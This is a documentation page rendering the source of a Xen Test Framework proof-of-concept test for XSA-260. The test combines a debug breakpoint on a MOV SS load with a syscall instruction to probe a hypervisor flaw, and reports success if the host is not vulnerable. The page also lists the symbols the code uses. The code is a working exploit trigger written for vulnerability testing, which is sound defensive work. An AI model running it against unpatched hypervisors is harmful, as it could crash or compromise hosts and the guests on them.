docs/xtf/xsa-260_2main_8c_source.html

 #include <xtf.h>

 const char test_title[] = "XSA-260 PoC";

 static unsigned int __user_data user_ss = __USER_DS;

 static void undo_stack(struct cpu_regs *regs)
 {
     /* This had better be a user frame, so ->_sp is safe in 32bit builds. */
     if ( IS_DEFINED(CONFIG_32BIT) )
         ASSERT((regs->cs & 3) == 3);

     regs->_sp = regs->bx;
 }

 void do_syscall(struct cpu_regs *regs)
 {
     printk("  Entered XTF via syscall\n");

     undo_stack(regs);

     if ( IS_DEFINED(CONFIG_32BIT) &&
          regs->cs == 0xe023 && regs->_ss == 0xe02b )
     {
         xtf_warning("Warning: Fixing up Xen's 32bit syscall selector bug\n");
         regs->cs  = __USER_CS;
         regs->_ss = __USER_DS;
     }
 }

 static bool ex_check_UD(struct cpu_regs *regs, const struct extable_entry *ex)
 {
     if ( regs->entry_vector == X86_EXC_UD )
     {
         printk("  Hit #UD for syscall (not vulnerable)\n");

         undo_stack(regs);
         regs->ip = ex->fixup;

         return true;
     }

     return false;
 }

 static void __user_text user_syscall(void)
 {
     asm volatile (/* Stash the stack pointer before clobbering it. */
                   "mov %%" _ASM_SP ", %%" _ASM_BX ";"

                   "btc $%c[bit], %%" _ASM_SP ";"
                   "mov %[ss], %%ss;"
                   "1: syscall; 2:"
                   _ASM_EXTABLE_HANDLER(1b, 2b, %P[hnd])
                   :
                   : [bit] "i" (BITS_PER_LONG - 1),
                     [ss]  "m" (user_ss),
                     [hnd] "p" (ex_check_UD)
 #ifdef __x86_64__
                   : "rbx", "rcx", "r11"
 #else
                   : "ebx", "ecx", "edx"
 #endif
         );
 }

 static void __user_text user_syscall_compat(void)
 {
     asm volatile (/* Stash the stack pointer before clobbering it. */
                   "mov %%" _ASM_SP ", %%" _ASM_BX ";"

                   /* Drop to a 32bit compat code segment. */
                   "push $%c[cs32];"
                   "push $1f;"
                   "lretq; 1:"
                   ".code32;"

                   /* Invert the top bit of the stack pointer. */
                   "btc $31, %%esp;"

                   /*
                    * Launch the attack.  Manually encode the memory reference
                    * to prevent the toolchain trying to write out a
                    * rip-relative reference in 32bit code.
                    */
                   "mov (%k[ss_ptr]), %%ss;"
                   "1: syscall; 2:"
                   _ASM_EXTABLE_HANDLER(1b, 2b, %P[hnd])

                   /* Return to 64bit mode. */
                   "ljmpl $%c[cs64], $1f; 1:"
                   ".code64;"
                   :
                   : [cs32]   "i" (__USER_CS32),
                     [ss_ptr] "R" (&user_ss),
                     [cs64]   "i" (__USER_CS),
                     [hnd] "p" (ex_check_UD)
 #ifdef __x86_64__
                   : "rbx", "rcx", "r11"
 #else
                   : "ebx", "ecx", "edx"
 #endif
         );
 }

 void test_main(void)
 {
     unsigned int ss = read_ss();

     write_dr0(_u(&ss));

     unsigned long dr7 = DR7_SYM(0, L, G, RW, 32) | X86_DR7_LE | X86_DR7_GE;

     /* Double %dr7 write to work around Xen's latching bug. */
     write_dr7(dr7);
     write_dr7(dr7);

     exinfo_t fault = 0, exp = EXINFO_SYM(DB, 0);

     /* Sanity check that breakpoints are working. */
     asm volatile ("mov %[ss], %%ss; nop; 1:"
                   _ASM_EXTABLE_HANDLER(1b, 1b, %P[rec])
                   : "+a" (fault)
                   : [ss] "m" (ss), [rec] "p" (ex_record_fault_eax));

     if ( fault != exp )
         return xtf_error("Error checking breakpoint\n"
                          "  Expected %#x %pe, got %#x %pe\n",
                          exp, _p(exp), fault, _p(fault));

     /* Prime the user code for its exploit attempt. */
     write_dr0(_u(&user_ss));

     printk("Testing native syscall\n");
     exec_user_void(user_syscall);

     /* For 64bit guests, try a compat syscall as well. */
     if ( IS_DEFINED(CONFIG_64BIT) )
     {
         printk("Testing compat syscall\n");
         exec_user_void(user_syscall_compat);
     }

     write_dr7(0);

     xtf_success("Success: Not vulnerable to XSA-260\n");
 }

 /*
  * Local variables:
  * mode: C
  * c-file-style: "BSD"
  * c-basic-offset: 4
  * tab-width: 4
  * indent-tabs-mode: nil
  * End:
  */
exinfo_t
unsigned int exinfo_t
Packed exception and error code information.
Definition: exinfo.h:19

extable_entry::fixup
unsigned long fixup
Fixup address.
Definition: extable.h:67

IS_DEFINED
#define IS_DEFINED(x)
Evalute whether the CONFIG_ token x is defined.
Definition: macro_magic.h:67

ex_record_fault_eax
bool ex_record_fault_eax(struct cpu_regs *regs, const struct extable_entry *ex)
Record the current fault in %eax.
Definition: extable.c:8

_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53

printk
void printk(const char *fmt,...)
Definition: console.c:134

xtf_warning
void xtf_warning(const char *fmt,...)
Report a test warning.
Definition: report.c:52

__user_text
#define __user_text
Definition: compiler.h:33

write_dr7
static void write_dr7(unsigned long val)
Definition: x86-dbg-reg.h:181

xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38

exec_user_void
static void exec_user_void(void(*fn)(void))
Definition: lib.h:70

user_syscall_compat
static void user_syscall_compat(void)
Definition: main.c:100

__user_data
#define __user_data
Definition: compiler.h:34

test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:137

undo_stack
static void undo_stack(struct cpu_regs *regs)
Definition: main.c:40

extable_entry
Exception table entry.
Definition: extable.h:64

DR7_SYM
#define DR7_SYM(bp,...)
Create a partial %dr7 setting for a particular breakpoint based on mnemonics.
Definition: x86-dbg-reg.h:100

test_title
const char test_title[]
The title of the test.
Definition: main.c:14

X86_EXC_UD
#define X86_EXC_UD
Definition: processor.h:108

user_ss
static unsigned int user_ss
Definition: main.c:38

ex_check_UD
static bool ex_check_UD(struct cpu_regs *regs, const struct extable_entry *ex)
Definition: main.c:64

do_syscall
void do_syscall(struct cpu_regs *regs)
May be implemented by a guest to handle SYSCALL invocations.
Definition: main.c:49

BITS_PER_LONG
#define BITS_PER_LONG
Definition: limits.h:12

X86_DR7_LE
#define X86_DR7_LE
Definition: x86-dbg-reg.h:29

_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48

EXINFO_SYM
#define EXINFO_SYM(exc, ec)
Definition: exinfo.h:29

_ASM_BX
#define _ASM_BX
Definition: asm_macros.h:36

X86_DR7_GE
#define X86_DR7_GE
Definition: x86-dbg-reg.h:30

xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80

write_dr0
static void write_dr0(unsigned long linear)
Definition: x86-dbg-reg.h:111

_ASM_SP
#define _ASM_SP
Definition: asm_macros.h:37

ASSERT
#define ASSERT(cond)
Definition: lib.h:14

_ASM_EXTABLE_HANDLER
#define _ASM_EXTABLE_HANDLER(fault, fixup, handler)
Create an exception table entry with custom handler.
Definition: extable.h:38

user_syscall
static void user_syscall(void)
Definition: main.c:79

read_ss
static unsigned int read_ss(void)
Definition: lib.h:169